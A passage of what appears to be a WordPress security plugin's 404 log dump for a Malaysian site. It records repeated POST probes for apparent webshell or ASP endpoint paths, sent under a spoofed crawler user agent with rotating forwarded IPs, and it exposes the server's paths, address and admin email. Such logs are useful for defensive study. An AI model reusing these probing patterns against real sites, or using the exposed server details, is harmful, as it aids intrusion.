04:06:38',35340184,37142832,'http://bintara.com.my//ziliao/Logout.asp',1,0,'121.193.162.44'),(28777,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//e/class/member.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"221.7.15.66\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"221.7.15.66\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-R4@4vBmywCERyagfsJwAAAQE\";s:12:\"REDIRECT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52459\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:10:\"SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-R4@4vBmywCERyagfsJwAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803619.7191\";s:12:\"REQUEST_TIME\";s:10:\"1571803619\";}}','notice','2019-10-23 04:07:01','2019-10-23 04:07:00',35263024,37067432,'http://bintara.com.my//e/class/member.ashx',1,0,'221.7.15.66'),(28778,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//e/class/member.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.52.120.110\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.52.120.110\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-R7O4vBmywCERyagfsKQAAAQc\";s:12:\"REDIRECT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52459\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:10:\"SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-R7O4vBmywCERyagfsKQAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571803628.466\";s:12:\"REQUEST_TIME\";s:10:\"1571803628\";}}','notice','2019-10-23 04:07:10','2019-10-23 04:07:09',35341608,37140896,'http://bintara.com.my//e/class/member.ashx',1,0,'210.52.120.110'),(28779,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//e/class/member.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.192.7.219\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.192.7.219\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-R9yGcwml6EYyVWZHUiQAAAIQ\";s:12:\"REDIRECT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53484\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/e/class/member.ashx\";s:10:\"SCRIPT_URL\";s:20:\"/e/class/member.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-R9yGcwml6EYyVWZHUiQAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803639.3709\";s:12:\"REQUEST_TIME\";s:10:\"1571803639\";}}','notice','2019-10-23 04:07:21','2019-10-23 04:07:19',35274008,37073904,'http://bintara.com.my//e/class/member.ashx',1,0,'121.192.7.219'),(28780,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"125.39.179.38\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"125.39.179.38\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SDuHARMCuuKQiJT-8lgAAAMg\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54107\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SDuHARMCuuKQiJT-8lgAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803662.6065\";s:12:\"REQUEST_TIME\";s:10:\"1571803662\";}}','notice','2019-10-23 04:07:45','2019-10-23 04:07:43',35338232,37136136,'http://bintara.com.my//inc/config.asp',1,0,'125.39.179.38'),(28781,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.206.111.1\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.206.111.1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SGdaMiBShLW1lPtcS7wAAAAU\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54483\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SGdaMiBShLW1lPtcS7wAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803673.5291\";s:12:\"REQUEST_TIME\";s:10:\"1571803673\";}}','notice','2019-10-23 04:07:55','2019-10-23 04:07:53',35270392,37073352,'http://bintara.com.my//inc/config.asp',1,0,'58.206.111.1'),(28782,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//pic/jingyiao.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"221.12.173.1\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"221.12.173.1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SJtaMiBShLW1lPtcS@QAAABI\";s:12:\"REDIRECT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54483\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SJtaMiBShLW1lPtcS@QAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803686.3419\";s:12:\"REQUEST_TIME\";s:10:\"1571803686\";}}','notice','2019-10-23 04:08:08','2019-10-23 04:08:06',35271688,37079976,'http://bintara.com.my//pic/jingyiao.ASp',1,0,'221.12.173.1'),(28783,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//pic/jingyiao.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"123.49.136.82\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"123.49.136.82\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SLdaMiBShLW1lPtcS@gAAABY\";s:12:\"REDIRECT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54483\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SLdaMiBShLW1lPtcS@gAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571803693.204\";s:12:\"REQUEST_TIME\";s:10:\"1571803693\";}}','notice','2019-10-23 04:08:17','2019-10-23 04:08:13',35264736,37069976,'http://bintara.com.my//pic/jingyiao.ASp',1,0,'123.49.136.82'),(28784,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//pic/jingyiao.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"118.24.199.154\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"118.24.199.154\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SMuHARMCuuKQiJT-8nQAAAMA\";s:12:\"REDIRECT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55188\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SMuHARMCuuKQiJT-8nQAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803699.0439\";s:12:\"REQUEST_TIME\";s:10:\"1571803699\";}}','notice','2019-10-23 04:08:22','2019-10-23 04:08:19',35343752,37139880,'http://bintara.com.my//pic/jingyiao.ASp',1,0,'118.24.199.154'),(28785,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//pic/jingyiao.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.83.120.102\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.83.120.102\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SN@HARMCuuKQiJT-8oAAAAMM\";s:12:\"REDIRECT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55188\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SN@HARMCuuKQiJT-8oAAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803704.2208\";s:12:\"REQUEST_TIME\";s:10:\"1571803704\";}}','notice','2019-10-23 04:08:28','2019-10-23 04:08:25',35267728,37069408,'http://bintara.com.my//pic/jingyiao.ASp',1,0,'58.83.120.102'),(28786,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//pic/jingyiao.ASp\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 